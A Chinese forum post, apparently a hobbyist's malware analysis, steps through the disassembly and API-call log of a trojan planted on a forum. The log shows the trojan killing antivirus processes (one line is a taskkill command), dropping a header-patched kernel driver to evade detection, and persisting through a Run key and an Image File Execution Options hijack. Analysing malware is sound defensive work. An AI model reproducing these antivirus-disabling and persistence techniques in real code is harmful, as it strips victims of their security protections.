今天UPK论坛被无聊人士挂马,打心里BS此类小黑.于是诞生了我的第一篇木马分析.
从http://www.unpack.cn/viewthread.php?tid=42409二楼下载木马主文件.记为A.EXE,脱壳后,分析如下:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>
主程序A.EXE分析
;>>>>>>>>>>>>>>>>>>>>>>>>>>>
00409C6D 68 38954000 push 409538 ; ASCII "tiouy"
00409C72 6A 01 push 1
00409C74 53 push ebx
00409C75 FF15 24104000 call dword ptr ds:[401024] ; KERNEL32.CreateMutexA
创建名为tiouy的互斥
0040A07F 8BF0 mov esi,eax
0040A081 68 EC954000 push 4095EC ; ASCII "OpenSCManagerA"
0040A086 56 push esi
打开scmanager
EAX 77DC4C36 ADVAPI32.OpenServiceA
ECX 001665F8
EDX 0012FE10 ASCII "wscsvc"
打开wscsvc服务
00409F31 68 98954000 push 409598 ; ASCII "ControlService"
00409F36 56 push esi
得到控制权
00409F81 68 B8954000 push 4095B8 ; ASCII "CloseServiceHandle"
00409F86 56 push esi
00409F87 FF15 30104000 call dword ptr ds:[401030] ; KERNEL32.GetProcAddress
关闭
0040A988 8A0C33 mov cl,byte ptr ds:[ebx+esi]
0040A98B 8AC3 mov al,bl
0040A98D C0E0 02 shl al,2
0040A990 2C 1E sub al,1E
0040A992 8BFE mov edi,esi
0040A994 02C8 add cl,al
0040A996 33C0 xor eax,eax
0040A998 880C33 mov byte ptr ds:[ebx+esi],cl
0040A99B 83C9 FF or ecx,FFFFFFFF
0040A99E 43 inc ebx
0040A99F F2:AE repne scas byte ptr es:[edi]
0040A9A1 F7D1 not ecx
0040A9A3 49 dec ecx
0040A9A4 3BD9 cmp ebx,ecx
0040A9A6 ^ 72 D6 jb short 0040A97E ; 0040A97E
解码字符串.
结果为:
0012FDEC 65 6B 72 6E 2E 65 78 65 00 04 00 00 65 67 75 69 ekrn.exe...egui
0012FDFC 2E 65 78 65 .exe
0040A5B1 68 F8964000 push 4096F8 ; ASCII "CreateToolhelp32Snapshot"
0040A5B6 56 push esi
0040A4A1 68 B8964000 push 4096B8 ; ASCII "Process32First"
0040A4A6 56 push esi
准备干坏事
0040AA64 /0F84 A8000000 je 0040AB12 ; 0040AB12
0040AA6A |8BAC24 40010000 mov ebp,dword ptr ss:[esp+140]
0040AA71 |8B35 44104000 mov esi,dword ptr ds:[401044] ; KERNEL32.OpenProcess
0040AA77 |8B3D 40104000 mov edi,dword ptr ds:[401040] ; KERNEL32.TerminateProcess
0040AA7D |8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AA81 |68 8C974000 push 40978C ; ASCII "360rp.exe"
0040AA86 |51 push ecx
0040AA87 |E8 54FBFFFF call 0040A5E0 ; 0040A5E0
0040AA8C |85C0 test eax,eax
0040AA8E |74 13 je short 0040AAA3 ; 0040AAA3
0040AA90 |8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AA94 |68 80974000 push 409780 ; ASCII "360sd.exe"
0040AA99 |52 push edx
0040AA9A |E8 41FBFFFF call 0040A5E0 ; 0040A5E0
0040AA9F |85C0 test eax,eax
0040AAA1 |75 37 jnz short 0040AADA ; 0040AADA
0040AAA3 |8B4424 1C mov eax,dword ptr ss:[esp+1C]
0040AAA7 |50 push eax
0040AAA8 |6A 00 push 0
0040AAAA |68 FF0F1F00 push 1F0FFF
0040AAAF |FFD6 call esi
0040AAB1 |6A 00 push 0
0040AAB3 |50 push eax
0040AAB4 |FFD7 call edi
0040AAB6 |8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AABA |51 push ecx
0040AABB |E8 800A0000 call 0040B540 ; 0040B540
0040AAC0 |6A 00 push 0
0040AAC2 |6A 00 push 0
0040AAC4 |68 6C974000 push 40976C ; ASCII " /f /im 360rp.exe"
0040AAC9 |68 60974000 push 409760 ; ASCII "taskkill"
0040AACE |6A 00 push 0
0040AAD0 |6A 00 push 0
0040AAD2 |E8 09F7FFFF call 0040A1E0 ; 0040A1E0
0040AAD7 |83C4 1C add esp,1C
0040AADA |E8 01FFFFFF call 0040A9E0 ; 0040A9E0
0040AADF |85C0 test eax,eax
0040AAE1 ^|0F85 5BFFFFFF jnz 0040AA42 ; 0040AA42
0040AAE7 |8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AAEB |55 push ebp
0040AAEC |52 push edx
0040AAED |E8 EEFAFFFF call 0040A5E0 ; 0040A5E0
0040AAF2 |85C0 test eax,eax
0040AAF4 |74 14 je short 0040AB0A ; 0040AB0A
0040AAF6 |8D4424 14 lea eax,dword ptr ss:[esp+14]
0040AAFA |50 push eax
0040AAFB |53 push ebx
0040AAFC |E8 CFF9FFFF call 0040A4D0 ; 0040A4D0
0040AB01 |85C0 test eax,eax
0040AB03 |74 0D je short 0040AB12 ; 0040AB12
0040AB05 ^|E9 73FFFFFF jmp 0040AA7D ; 0040AA7D
0040AB0A |C74424 10 01000>mov dword ptr ss:[esp+10],1
0040AB12 \53 push ebx
一个循环,干掉360杀毒.
00409D12 BE 10B84000 mov esi,40B810 ; ASCII "C:\WINDOWS\system32\K5C21.exe"
00409D17 68 04010000 push 104
00409D1C 56 push esi
00409D1D FF15 38104000 call dword ptr ds:[401038] ; KERNEL32.GetSystemDirectoryA
00409D23 8B3D 68104000 mov edi,dword ptr ds:[401068] ; KERNEL32.lstrcatA
00409D29 68 34954000 push 409534
00409D2E 56 push esi
00409D2F FFD7 call edi
00409D31 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00409D34 50 push eax
00409D35 56 push esi
00409D36 FFD7 call edi
00409D38 68 2C954000 push 40952C ; ASCII ".exe"
00409D3D 56 push esi
获取系统目录,准备生成文件了.
0040AE85 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AE8A 83C9 FF or ecx,FFFFFFFF
0040AE8D F2:AE repne scas byte ptr es:[edi]
0040AE8F F7D1 not ecx
0040AE91 2BF9 sub edi,ecx
0040AE93 68 D8B64000 push 40B6D8
0040AE98 8BC1 mov eax,ecx
0040AE9A 8BF7 mov esi,edi
0040AE9C BF D8B64000 mov edi,40B6D8
0040AEA1 C1E9 02 shr ecx,2
0040AEA4 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AEA6 8BC8 mov ecx,eax
0040AEA8 83E1 03 and ecx,3
0040AEAB F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AEAD 8D4C24 3C lea ecx,dword ptr ss:[esp+3C]
0040AEB1 51 push ecx
0040AEB2 E8 29F7FFFF call 0040A5E0 ; 0040A5E0
0040AEB7 85C0 test eax,eax
0040AEB9 75 08 jnz short 0040AEC3 ; 0040AEC3
0040AEBB C74424 10 01000>mov dword ptr ss:[esp+10],1
0040AEC3 6A 01 push 1
0040AEC5 E8 46EFFFFF call 00409E10 ; 00409E10
0040AECA BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AECF 83C9 FF or ecx,FFFFFFFF
0040AED2 33C0 xor eax,eax
0040AED4 F2:AE repne scas byte ptr es:[edi]
0040AED6 F7D1 not ecx
0040AED8 49 dec ecx
0040AED9 83F9 06 cmp ecx,6
0040AEDC 76 42 jbe short 0040AF20 ; 0040AF20
0040AEDE 8D5424 38 lea edx,dword ptr ss:[esp+38]
0040AEE2 68 ECB64000 push 40B6EC ; ASCII "ras.exe"
0040AEE7 52 push edx
0040AEE8 E8 F3F6FFFF call 0040A5E0 ; 0040A5E0
0040AEED 85C0 test eax,eax
0040AEEF 75 2F jnz short 0040AF20 ; 0040AF20
0040AEF1 8B4424 1C mov eax,dword ptr ss:[esp+1C]
0040AEF5 50 push eax
0040AEF6 E8 55FEFFFF call 0040AD50 ; 0040AD50
0040AEFB 83C4 04 add esp,4
0040AEFE 8D4C24 38 lea ecx,dword ptr ss:[esp+38]
0040AF02 68 E4974000 push 4097E4 ; ASCII "rstray.exe"
0040AF07 51 push ecx
0040AF08 E8 D3F6FFFF call 0040A5E0 ; 0040A5E0
0040AF0D 85C0 test eax,eax
0040AF0F 75 0F jnz short 0040AF20 ; 0040AF20
0040AF11 E8 9A010000 call 0040B0B0 ; 0040B0B0
0040AF16 68 D0070000 push 7D0
0040AF1B E8 F0EEFFFF call 00409E10 ; 00409E10
0040AF20 43 inc ebx
0040AF21 83FB 12 cmp ebx,12
0040AF24 ^ 0F8E F6FEFFFF jle 0040AE20 ; 0040AE20
0040AF2A 8D5424 14 lea edx,dword ptr ss:[esp+14]
0040AF2E 52 push edx
0040AF2F 55 push ebp
0040AF30 E8 9BF5FFFF call 0040A4D0 ; 0040A4D0
0040AF35 85C0 test eax,eax
0040AF37 ^ 0F85 E1FEFFFF jnz 0040AE1E ; 0040AE1E
0040AF3D 55 push ebp
0040AF3E E8 CDF5FFFF call 0040A510 ; 0040A510
0040AF43 8B4424 10 mov eax,dword ptr ss:[esp+10]
0040AF47 85C0 test eax,eax
0040AF49 74 6C je short 0040AFB7 ; 0040AFB7
0040AF4B BB BC464000 mov ebx,4046BC
0040AF50 8B3B mov edi,dword ptr ds:[ebx]
0040AF52 83C9 FF or ecx,FFFFFFFF
0040AF55 33C0 xor eax,eax
0040AF57 68 ECB64000 push 40B6EC ; ASCII "ras.exe"
0040AF5C F2:AE repne scas byte ptr es:[edi]
0040AF5E F7D1 not ecx
0040AF60 2BF9 sub edi,ecx
0040AF62 8BC1 mov eax,ecx
0040AF64 8BF7 mov esi,edi
0040AF66 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AF6B C1E9 02 shr ecx,2
0040AF6E F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AF70 8BC8 mov ecx,eax
0040AF72 83E1 03 and ecx,3
0040AF75 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AF77 E8 E4F9FFFF call 0040A960 ; 0040A960
0040AF7C BF 2C954000 mov edi,40952C ; ASCII ".exe"
0040AF81 83C9 FF or ecx,FFFFFFFF
0040AF84 33C0 xor eax,eax
0040AF86 83C4 04 add esp,4
0040AF89 F2:AE repne scas byte ptr es:[edi]
0040AF8B F7D1 not ecx
0040AF8D 2BF9 sub edi,ecx
0040AF8F 83C3 04 add ebx,4
0040AF92 8BF7 mov esi,edi
0040AF94 8BD1 mov edx,ecx
0040AF96 BF ECB64000 mov edi,40B6EC ; ASCII "ras.exe"
0040AF9B 83C9 FF or ecx,FFFFFFFF
0040AF9E F2:AE repne scas byte ptr es:[edi]
0040AFA0 8BCA mov ecx,edx
0040AFA2 4F dec edi
0040AFA3 C1E9 02 shr ecx,2
0040AFA6 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
0040AFA8 8BCA mov ecx,edx
0040AFAA 83E1 03 and ecx,3
0040AFAD 81FB DC464000 cmp ebx,4046DC
0040AFB3 F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[>
0040AFB5 ^ 7E 99 jle short 0040AF50 ; 0040AF50
0040AFB7 5F pop edi
0040AFB8 5E pop esi
0040AFB9 5B pop ebx
0040AFBA 33C0 xor eax,eax
0040AFBC 5D pop ebp
0040AFBD 81C4 2C010000 add esp,12C
0040AFC3 C3 retn
循环解码杀软进程字符串,干掉瑞星,咔吧,金山等...
0012FDF8 61 76 70 2E 65 78 65 00 33 36 30 74 72 61 79 2E avp.exe.360tray.
0012FE08 65 78 65 00 73 61 66 65 62 6F 78 74 72 61 79 2E exe.safeboxtray.
0012FE18 65 78 65 00 exe.
干掉咔吧和360主程序及保险箱.
00409A3A FF15 60104000 call dword ptr ds:[401060] ; KERNEL32.GetTickCount
00409A40 6A 0A push 0A
00409A42 33D2 xor edx,edx
00409A44 59 pop ecx
00409A45 F7F1 div ecx
00409A47 8BF0 mov esi,eax
00409A49 8D4424 24 lea eax,dword ptr ss:[esp+24]
00409A4D 50 push eax
00409A4E 68 04010000 push 104
00409A53 FF15 64104000 call dword ptr ds:[401064] ; KERNEL32.GetTempPathA
00409A59 8D4424 10 lea eax,dword ptr ss:[esp+10]
00409A5D 6A 0A push 0A
用GetTickCount生成一个数A,获取临时文件目录.
0040B872 00 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 .C:\DOCUME~1\AD
0040B882 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C MINI~1\LOCALS~1\
0040B892 54 65 6D 70 5C 7E 32 32 38 32 37 38 2E 65 78 00 Temp\~228278.ex.
生成一个~A.ex文件.是个驱动文件
0040B630 33C0 xor eax,eax
0040B632 B1 0F mov cl,0F
0040B634 8A90 64694000 mov dl,byte ptr ds:[eax+406964]
0040B63A 32D1 xor dl,cl
0040B63C 8890 64694000 mov byte ptr ds:[eax+406964],dl
0040B642 40 inc eax
0040B643 3D 002A0000 cmp eax,2A00
0040B648 ^ 7C EA jl short 0040B634 ; 0040B634
~A.ex的解码过程.
00406964 42 0F 9F 0F 0C 0F 0F 0F 0B 0F 0F 0F F0 F0 0F 0F B?.痧
00406974 B7 0F 0F 0F 0F 0F 0F 0F 4F 0F 0F 0F 0F 0F 0F 0F ?O
00406984 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F
00406994 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F EF 0F 0F 0F ?
004069A4 01 10 B5 01 0F BB 06 C2 2E B7 0E 43 C2 2E 5B 67 ????C?[g
解码前
00406964 4D 00 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? M.?......????
00406974 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00406984 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00406994 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004069A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
解码后
PE头部少了一个Z,别急,他后面还会补上.难道PE头不完整,然后补完可以欺骗杀毒软件的主动?
0012FC8C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FC90 0040B874 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FC94 40000000 |Access = GENERIC_WRITE
0012FC98 00000001 |ShareMode = FILE_SHARE_READ
0012FC9C 00000000 |pSecurity = NULL
0012FCA0 00000002 |Mode = CREATE_ALWAYS
0012FCA4 00000000 |Attributes = 0
0012FCA8 00000000 \hTemplateFile = NULL
开始创建了
0012FC9C 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCA0 00000074 |hFile = 00000074
0012FCA4 00406964 |Buffer = 复件_a.00406964
0012FCA8 00002A00 |nBytesToWrite = 2A00 (10752.)
0012FCAC 0012FCDC |pBytesWritten = 0012FCDC
0012FCB0 00000000 \pOverlapped = NULL
写入内容.
0012FC98 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FC9C 0040B874 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FCA0 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
0012FCA4 00000001 |ShareMode = FILE_SHARE_READ
0012FCA8 00000000 |pSecurity = NULL
0012FCAC 00000003 |Mode = OPEN_EXISTING
0012FCB0 00000000 |Attributes = 0
0012FCB4 00000000 \hTemplateFile = NULL
又重新打开.注意这里的Mode = OPEN_EXISTING
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 00000001 |OffsetLo = 1
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指针指向1位置.
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409508 |Buffer = 复件_a.00409508
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
补上故意漏掉的Z...过启发???
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 000019C8 |OffsetLo = 19C8 (6600.)
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指针指向19C8
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409504 |Buffer = 复件_a.00409504
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
00409504 51 00 00 00 5A 00 00 00 65 00 00 00 2E 65 78 00 Q...Z...e....ex.
补上一个Q
0012FCB0 00409E77 /CALL 到 SetFilePointer 来自 复件_a.00409E75
0012FCB4 00000074 |hFile = 00000074
0012FCB8 00000065 |OffsetLo = 65 (101.)
0012FCBC 00000000 |pOffsetHi = NULL
0012FCC0 00000000 \Origin = FILE_BEGIN
指向65
0012FCA8 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCAC 00000074 |hFile = 00000074
0012FCB0 00409500 |Buffer = 复件_a.00409500
0012FCB4 00000001 |nBytesToWrite = 1
0012FCB8 0012FCF0 |pBytesWritten = 0012FCF0
0012FCBC 00000000 \pOverlapped = NULL
00409500 72 00 00 00 51 00 00 00 5A 00 00 00 65 00 00 00 r...Q...Z...e...
补上一个r
0040A521 68 D8964000 push 4096D8 ; ASCII "CloseHandle"
0040A526 56 push esi
0040A527 FF15 30104000 call dword ptr ds:[401030] ; KERNEL32.GetProcAddress
终于完事了
0012FC9C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FCA0 0040B978 |FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.exe"
0012FCA4 40000000 |Access = GENERIC_WRITE
0012FCA8 00000001 |ShareMode = FILE_SHARE_READ
0012FCAC 00000000 |pSecurity = NULL
0012FCB0 00000002 |Mode = CREATE_ALWAYS
0012FCB4 00000000 |Attributes = 0
0012FCB8 00000000 \hTemplateFile = NULL
新建这~A.EXE,与前面生成的驱动文件名字一样.
0012FCAC 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCB0 00000074 |hFile = 00000074
0012FCB4 00404764 |Buffer = 复件_a.00404764
0012FCB8 00002200 |nBytesToWrite = 2200 (8704.)
0012FCBC 0012FCF0 |pBytesWritten = 0012FCF0
0012FCC0 00000000 \pOverlapped = NULL
00404764 4D 5A 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? MZ??????????????
00404774 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00404784 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00404794 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004047A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
004047B4 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
004047C4 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
004047D4 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
004047E4 49 20 90 D9 0D 41 FE 8A 0D 41 FE 8A 0D 41 FE 8A I 愘.A.A.A
004047F4 76 5D F2 8A 0C 41 FE 8A 62 5E FA 8A 0F 41 FE 8A v]驃.Ab^鷬A
写入内容.这次他没有折腾了..
0012FC9C 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FCA0 0040B810 |FileName = "C:\WINDOWS\system32\K5C21.exe"
0012FCA4 40000000 |Access = GENERIC_WRITE
0012FCA8 00000001 |ShareMode = FILE_SHARE_READ
0012FCAC 00000000 |pSecurity = NULL
0012FCB0 00000002 |Mode = CREATE_ALWAYS
0012FCB4 00000000 |Attributes = 0
0012FCB8 00000000 \hTemplateFile = NULL
生成这么个东东.记为B.EXE
0012FCAC 0040A2CC /CALL 到 WriteFile 来自 复件_a.0040A2CA
0012FCB0 00000074 |hFile = 00000074
0012FCB4 00404764 |Buffer = 复件_a.00404764
0012FCB8 00002200 |nBytesToWrite = 2200 (8704.)
0012FCBC 0012FCF0 |pBytesWritten = 0012FCF0
0012FCC0 00000000 \pOverlapped = NULL
内容跟~A.EXE一模一样.恩,留个后路...
004098A0 E8 5B100000 call 0040A900 ; 0040A900
004098A5 6A 07 push 7
004098A7 BE D4944000 mov esi,4094D4
004098AC 59 pop ecx
004098AD 8D7D 88 lea edi,dword ptr ss:[ebp-78]
004098B0 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004098B2 A4 movs byte ptr es:[edi],byte ptr ds:[esi]
004098B3 6A 0A push 0A
004098B5 33C0 xor eax,eax
004098B7 59 pop ecx
004098B8 8D7D A5 lea edi,dword ptr ss:[ebp-5B]
004098BB F3:AB rep stos dword ptr es:[edi]
004098BD 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098C0 50 push eax
004098C1 E8 3A100000 call 0040A900 ; 0040A900
004098C6 6A 05 push 5
004098C8 BE BC944000 mov esi,4094BC
004098CD 59 pop ecx
004098CE 8D7D D0 lea edi,dword ptr ss:[ebp-30]
004098D1 F3:A5 rep movs dword ptr es:[edi],dword ptr ds>
004098D3 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004098D6 50 push eax
004098D7 66:A5 movs word ptr es:[edi],word ptr ds:[esi]
004098D9 E8 22100000 call 0040A900 ; 0040A900
004098DE 83C4 0C add esp,0C
004098E1 8D45 D0 lea eax,dword ptr ss:[ebp-30]
004098E4 50 push eax
004098E5 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098E8 50 push eax
004098E9 FF15 68104000 call dword ptr ds:[401068] ; KERNEL32.lstrcatA
004098EF 8D45 FC lea eax,dword ptr ss:[ebp-4]
004098F2 50 push eax
004098F3 68 3F000F00 push 0F003F
004098F8 8D45 88 lea eax,dword ptr ss:[ebp-78]
004098FB 6A 00 push 0
004098FD 50 push eax
004098FE FF75 08 push dword ptr ss:[ebp+8]
00409901 FF15 04104000 call dword ptr ds:[401004] ; ADVAPI32.RegOpenKeyExA
call 0040A900这个前面提到过了,是字符串解码函数.解码结果如下:
0012FD94 53 4F 46 54 57 41 52 45 5C 5C 4D 69 63 72 6F 73 SOFTWARE\\Micros
0012FDA4 6F 66 74 5C 5C 57 69 6E 64 6F 77 73 5C 5C 43 75 oft\\Windows\\Cu
0012FDB4 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 5C 52 75 rrentVersion\\Ru
0012FDC4 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 n...............
0012FDD4 00 00 00 00 00 00 00 00 5C 5C 43 75 72 72 65 6E ........\\Curren
0012FDE4 74 56 65 72 73 69 6F 6E 5C 5C 52 75 6E 00 00 00 tVersion\\Run...
0012FDF4 6D 73 63 6F 6E 66 69 67 00 00 00 00 00 00 00 00 msconfig........
0012FD7C 0012FD94 |Subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
打开这个项
0012FD74 00000000 |hKey = 0
0012FD78 0012FDF4 |ValueName = "msconfigs"
0012FD7C 00000000 |Reserved = 0
0012FD80 00000001 |ValueType = REG_SZ
0012FD84 0040B810 |Buffer = 复件_a.0040B810
0012FD88 0000003C \BufSize = 3C (60.)
0012FD8C 7C834D59 KERNEL32.lstrcatA
0012FD90 0040B810 ASCII "C:\WINDOWS\system32\K5C21.exe"
把msconfigs路径指向C:\WINDOWS\system32\K5C21.exe
0040A6FF 68 48974000 push 409748 ; ASCII "SeDebugPrivilege"
0040A704 6A 00 push 0
0040A706 FF15 0C104000 call dword ptr ds:[40100C] ; ADVAPI32.LookupPrivilegeValueA
0040A70C 85C0 test eax,eax
0040A70E 74 28 je short 0040A738 ; 0040A738
0040A710 8B4C24 00 mov ecx,dword ptr ss:[esp]
0040A714 6A 00 push 0
0040A716 6A 00 push 0
0040A718 8D4424 0C lea eax,dword ptr ss:[esp+C]
0040A71C 6A 00 push 0
0040A71E 50 push eax
0040A71F 6A 00 push 0
0040A721 51 push ecx
0040A722 C74424 1C 01000>mov dword ptr ss:[esp+1C],1
0040A72A C74424 28 02000>mov dword ptr ss:[esp+28],2
0040A732 FF15 08104000 call dword ptr ds:[401008] ; ADVAPI32.AdjustTokenPrivileges
提权,准备干坏事.
0012FD30 0040A014 /CALL 到 CreateServiceA 来自 复件_a.0040A012
0012FD34 001664C0 |hManager = 001664C0
0012FD38 0040975C |ServiceName = "xx"
0012FD3C 0040975C |DisplayName = "xx"
0012FD40 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS
0012FD44 00000001 |ServiceType = SERVICE_KERNEL_DRIVER
0012FD48 00000003 |StartType = SERVICE_DEMAND_START
0012FD4C 00000001 |ErrorControl = SERVICE_ERROR_NORMAL
0012FD50 0040B874 |BinaryPathName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
0012FD54 00000000 |LoadOrderGroup = NULL
0012FD58 00000000 |pTagId = NULL
0012FD5C 00000000 |pDependencies = NULL
0012FD60 00000000 |ServiceStartName = NULL
0012FD64 00000000 \Password = NULL
新建服务.服务名比较XX...
0040A041 68 DC954000 push 4095DC ; ASCII "StartServiceA"
0040A046 56 push esi
启动服务.
0012FDAC 00409EB8 /CALL 到 DeleteFileA 来自 复件_a.00409EB6
0012FDB0 0040B874 \FileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~228278.ex"
毁尸灭迹
0012FDA4 0040A276 /CALL 到 CreateFileA 来自 复件_a.0040A274
0012FDA8 0012FDF4 |FileName = "\\.\ao1"
0012FDAC 80000000 |Access = GENERIC_READ
0012FDB0 00000000 |ShareMode = 0
0012FDB4 00000000 |pSecurity = NULL
0012FDB8 00000003 |Mode = OPEN_EXISTING
0012FDBC 00000000 |Attributes = 0
0012FDC0 00000000 \hTemplateFile = NULL
打开这个东东.
00409BFA FF15 54104000 call dword ptr ds:[401054] ; KERNEL32.DeviceIoControl
0012FDCC 00000084 |hDevice = 00000084 (window)
0012FDD0 0022001C |IoControlCode = 22001C
0012FDD4 00404764 |InBuffer = 复件_a.00404764
0012FDD8 00002200 |InBufferSize = 2200 (8704.)
0012FDDC 00000000 |OutBuffer = NULL
0012FDE0 00000000 |OutBufferSize = 0
0012FDE4 0012FDFC |pBytesReturned = 0012FDFC
0012FDE8 00000000 \pOverlapped = NULL
00404764 4D 5A 90 00 03 00 00 00 04 00 00 00 ?? ?? ?? ?? MZ?......????
00404774 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00404784 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00404794 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
004047A4 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ?.???L?Th
004047B4 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
004047C4 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
004047D4 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
004047E4 49 20 90 D9 0D 41 FE 8A 0D 41 FE 8A 0D 41 FE 8A I 愘.A.A.A
004047F4 76 5D F2 8A 0C 41 FE 8A 62 5E FA 8A 0F 41 FE 8A v]驃.Ab^鷬A
DeviceIoControl
00409C06 6A 05 push 5
00409C08 68 78B94000 push 40B978 ; ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1
\Temp\~228278.exe"
00409C0D FF15 58104000 call dword ptr ds:[401058] ; KERNEL32.WinExec
"PUSH 5"光明正大运行木马.....太可耻了
0040B554 68 08474000 push 404708 ; ASCII "SOFTWARE\Microsoft\Windows
NT\currentVersion\image file Execution options\"
0040B559 F3:AB rep stos dword ptr es:[edi]
0040B55B 66:AB stos word ptr es:[edi]
0040B55D AA stos byte ptr es:[edi]
0040B55E 8D4424 0C lea eax,dword ptr ss:[esp+C]
0040B562 50 push eax
0040B563 FF15 4C104000 call dword ptr ds:[40104C] ; KERNEL32.lstrcpyA
0040B569 8B8C24 84000000 mov ecx,dword ptr ss:[esp+84]
0040B570 8D5424 08 lea edx,dword ptr ss:[esp+8]
0040B574 51 push ecx
0040B575 52 push edx
0040B576 FF15 68104000 call dword ptr ds:[401068] ; KERNEL32.lstrcatA
0040B57C 8D4424 04 lea eax,dword ptr ss:[esp+4]
0040B580 8D4C24 08 lea ecx,dword ptr ss:[esp+8]
0040B584 50 push eax
0040B585 51 push ecx
0040B586 68 02000080 push 80000002
0040B58B E8 90EDFFFF call 0040A320 ; 0040A320
0040B590 6A 00 push 0
0040B592 6A 00 push 0
0040B594 68 70984000 push 409870 ; ASCII "zzzzzzzz"
0040B599 6A FF push -1
0040B59B E8 F0EBFFFF call 0040A190 ; 0040A190
0040B5A0 68 AC464000 push 4046AC ; ASCII "services.exe"
0040B5A5 FF15 70104000 call dword ptr ds:[401070] ; KERNEL32.lstrlenA
0040B5AB 8B5424 04 mov edx,dword ptr ss:[esp+4]
0040B5AF 40 inc eax
0040B5B0 50 push eax
0040B5B1 68 AC464000 push 4046AC ; ASCII "services.exe"
0040B5B6 6A 01 push 1
0040B5B8 6A 00 push 0
0040B5BA 68 64984000 push 409864 ; ASCII "Debugger"
0040B5BF 52 push edx
0040B5C0 E8 ABEDFFFF call 0040A370 ; 0040A370
0012FE00 0012FFA8 ASCII "egui.exe"
0012FE04 0012FFA8 ASCII "egui.exe"
在SOFTWARE\Microsoft\Windows NT\currentVersion\image file Execution options\
新建一个egui.exe项,名称为Debugger,内容为services.exe
大忽悠....
